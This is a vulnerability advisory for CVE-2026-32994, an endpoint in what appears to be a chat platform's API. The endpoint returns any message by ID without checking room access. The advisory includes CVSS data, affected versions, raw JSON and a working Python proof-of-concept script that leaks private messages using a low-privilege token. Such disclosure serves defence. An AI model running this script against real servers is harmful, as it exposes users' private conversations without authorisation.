Security Vulnerability Report
CVE-2026-32994 CVSS 5.3 MEDIUM

Published: 2026-05-19 05:16:24
Last Modified: 2026-05-19 14:50:07

Description

The /api/v1/autotranslate.translateMessage endpoint in versions <8.5.0, <8.4.2, <8.3.4, <8.2.4, <8.1.5, <8.0.6, <7.13.8, and <7.10.12 allows any authenticated user to retrieve the full content of any message from any room (private groups, direct messages, channels) by simply providing the target message ID. The endpoint fetches the message via Messages.findOneById(messageId) with no room access check (canAccessRoomIdAsync is never called), returning the complete IMessage object including message text, sender info, room ID, timestamps, and markdown content.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

< 8.5.0
< 8.4.2
< 8.3.4
< 8.2.4
< 8.1.5
< 8.0.6
< 7.13.8
< 7.10.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL
url = "https://target-domain.com/api/v1/autotranslate.translateMessage"

# Headers with authentication token (Low privilege user)
headers = {
    "X-Auth-Token": "YOUR_LOW_PRIV_TOKEN",
    "X-User-Id": "YOUR_USER_ID",
    "Content-Type": "application/json"
}

# Payload containing the target message ID (e.g., from a private channel)
payload = {
    "messageId": "TARGET_MESSAGE_ID"
}

# Send request
response = requests.post(url, json=payload, headers=headers)

# Check response
if response.status_code == 200:
    print("Vulnerable! Leaked data:")
    print(response.json())
else:
    print(f"Request failed: {response.status_code}")

References

https://hackerone.com/reports/3713682

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32994", "sourceIdentifier": "[email protected]", "published": "2026-05-19T05:16:23.787", "lastModified": "2026-05-19T14:50:07.413", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The /api/v1/autotranslate.translateMessage endpoint in versions <8.5.0, <8.4.2, <8.3.4, <8.2.4, <8.1.5, <8.0.6, <7.13.8, and <7.10.12 allows any authenticated user to retrieve the full content of any message from any room (private groups, direct messages, channels) by simply providing the target message ID. The endpoint fetches the message via Messages.findOneById(messageId) with no room access check (canAccessRoomIdAsync is never called), returning the complete IMessage object including message text, sender info, room ID, timestamps, and markdown content."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://hackerone.com/reports/3713682", "source": "[email protected]"}]}}